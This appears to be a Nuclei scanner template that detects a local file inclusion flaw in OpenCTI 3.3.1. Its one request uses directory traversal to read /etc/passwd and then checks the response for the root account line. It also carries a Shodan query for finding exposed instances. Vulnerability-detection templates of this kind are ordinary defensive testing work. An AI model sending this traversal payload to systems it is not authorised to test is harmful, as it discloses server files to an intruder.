nuclei-templates/http/vulnerabilities/other/opencti-lfi.yaml

36 lines
799 B
YAML
Raw Normal View History

2022-07-20 22:47:38 +00:00
id: opencti-lfi
info:
name: OpenCTI 3.3.1 - Local File Inclusion
2022-07-20 22:47:38 +00:00
author: 0x_Akoko
severity: high
description: OpenCTI 3.3.1 is vulnerable to local file inclusion.
reference:
- https://cxsecurity.com/issue/WLB-2020060078
- https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1
metadata:
max-request: 1
verified: true
shodan-query: http.html:"OpenCTI"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: opencti,lfi,oss
2022-07-20 22:47:38 +00:00
http:
2022-07-20 22:47:38 +00:00
- method: GET
path:
- "{{BaseURL}}/static/css//../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200